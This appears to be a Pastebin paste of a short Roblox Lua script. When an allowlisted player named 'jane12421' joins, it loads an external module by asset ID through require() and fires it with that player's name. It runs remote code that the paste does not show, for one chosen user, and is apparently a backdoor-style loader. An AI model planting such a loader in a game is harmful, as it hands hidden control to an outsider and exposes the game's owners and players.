Advertisement
whyumean

Untitled

Feb 3rd, 2020
167
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. local allowed = {"jane12421"}
  2. game.Players.PlayerAdded:Connect(function(player)
  3. for i, v in pairs(allowed) do
  4. if player.Name == v then
  5. require(4626298533):Fire(player.Name)
  6. end
  7. end
  8. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement